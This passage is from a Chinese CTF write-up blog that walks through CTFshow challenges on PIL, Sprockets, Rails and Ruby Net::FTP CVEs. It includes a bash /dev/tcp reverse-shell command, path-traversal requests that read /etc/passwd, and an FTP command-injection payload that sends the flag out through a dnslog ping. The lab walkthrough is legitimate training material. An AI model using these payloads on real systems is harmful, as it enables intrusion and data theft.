<p>比如<a target="_blank" rel="noopener" href="https://github.com/vulhub/vulhub/blob/master/python/PIL-CVE-2017-8291/poc.png">poc.png</a>，我们上传之，即可执行touch /tmp/aaaaa。将POC中的命令改为反弹命令(bash -c “bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1”)，即可获得shell：<br><img src="https://z3.ax1x.com/2021/06/18/Rpnatg.png"></p>
<h1><span id="web597">WEB597</span></h1><p>Ruby On Rails 路径穿越漏洞（CVE-2018-3760）<br>Ruby On Rails在开发环境下使用Sprockets作为静态文件服务器，Ruby On Rails是著名Ruby Web开发框架，Sprockets是编译及分发静态资源文件的Ruby库。</p>
<p>Sprockets 3.7.1及之前版本中，存在一处因为二次解码导致的路径穿越漏洞，攻击者可以利用%252e%252e/来跨越到根目录，读取或执行目标服务器上任意文件。</p>
<p>直接访问IP/assets/file:%2f%2f/etc/passwd，将会报错，因为文件/etc/passwd不在允许的目录中：<br><img src="https://z3.ax1x.com/2021/06/18/RpM9k8.png"><br>在上方的报错中随意选择一个路径利用../返回上一级，成功实现任意文件读取<br><img src="https://z3.ax1x.com/2021/06/18/RpMSTf.png"></p>
<h1><span id="web598">WEB598</span></h1><p>Ruby on Rails 路径穿越与任意文件读取漏洞（CVE-2019-5418）</p>
<p>在控制器中通过render file形式来渲染应用之外的视图，且会根据用户传入的Accept头来确定文件具体位置。我们通过传入<code>Accept: ../../../../../../../../etc/passwd&#123;&#123;</code>头来构成构造路径穿越漏洞，读取任意文件。</p>
<p>访问/robots并抓包传入Accept<br><img src="https://z3.ax1x.com/2021/06/18/RplnWF.png"></p>
<h1><span id="web599">WEB599</span></h1><p>Ruby Net::FTP 模块命令注入漏洞（CVE-2017-17405）<br>这一题做的时间比较久，一直反弹不出来，最后向bit师傅学到了一个新的姿势</p>
<p>因为这是一个FTP客户端的漏洞，所以我们需要先运行一个可以被访问到的服务端。比如使用python：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"># 安装pyftpdlib</span><br><span class="line">pip install pyftpdlib</span><br><span class="line"></span><br><span class="line"># 在当前目录下启动一个ftp服务器，默认监听在`0.0.0.0:2121`端口</span><br><span class="line">python3 -m pyftpdlib -p 2121 -i 0.0.0.0</span><br></pre></td></tr></table></figure>
<p><img src="https://z3.ax1x.com/2021/06/18/Rp8Goq.png" alt="Rp8Goq.png"><br>然后即可开始利用漏洞。发送如下数据包即可（填上你的FTP服务器的ip和端口，空格要用${IFS}代替，使用前先在<a target="_blank" rel="noopener" href="http://dnslog.cn/">dnslog.cn</a>创建一个子域名用来接收数据(替换下面的子域名)）：</p>
<p><code>IP/download?uri=ftp://FTPIP:FTPPORT/&amp;file=|ping$&#123;IFS&#125;$FLAG.qfy4pq.dnslog.cn$&#123;IFS&#125;-c$&#123;IFS&#125;2</code><br>观察ftp服务器，收到数据包<br><img src="https://z3.ax1x.com/2021/06/18/Rp8YF0.png" alt="Rp8YF0.png"><br>dnslog收到数据<br><img src="https://z3.ax1x.com/2021/06/18/Rp8tYV.png" alt="Rp8tYV.png"></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">lewiserii</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="https://lewiserii.github.io/2021/06/18/ctfshow-WP/CTFshow-组件漏洞/">https://lewiserii.github.io/2021/06/18/ctfshow-WP/CTFshow-组件漏洞/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/WP/">WP</a></div><div class="addthis_inline_share_toolbox pull-right"></div><script src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-60c1ef4fda039536" async></script><nav id="pagination"><div class="prev-post pull-left"><a href="/2021/06/20/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%80%BB%E7%BB%93/"><i class="fa fa-chevron-left">  </i><span>文件上传总结</span></a></div><div class="next-post pull-right"><a href="/2021/06/16/ctfshow-WP/CTFshow-%E7%BE%A4%E5%8F%8B%E6%8C%91%E6%88%98/"><span>CTFshow-群友挑战-wp</span><i class="fa fa-chevron-right"></i></a></div></nav><div id="vcomment"></div><script src="https://cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js"></script><script>var notify = 'false' == 'true';
var verify = 'false' == 'true';
var record_ip = 'false' == 'true';
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;
window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  recordIP:record_ip,
  appId:'Y32PcxBjfcdoJLlgIjJpdXqG-gzGzoHsz',
  appKey:'ePCEw0S8BnFNkr2CvMhzGyNu',
  placeholder:'Just go go',
  avatar:'wavatar',
  guest_info:guest_info,
  pageSize:'10',
  lang: 'zh-cn'
})</script></div></div><footer class="footer-bg" style="background-image: url(https://z3.ax1x.com/2021/06/12/25MFGd.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2021 By lewiserii</div><div class="framework-info"><span>Driven - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="footer_custom_text">hitokoto</div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script src="/js/search/algolia.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="algolia-search"><div class="search-dialog__title" id="algolia-search-title">Algolia</div><div id="algolia-input-panel"><div id="algolia-search-input"></div></div><hr><div id="algolia-search-results"><div id="algolia-hits"></div><div id="algolia-pagination"></div><div id="algolia-stats"></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>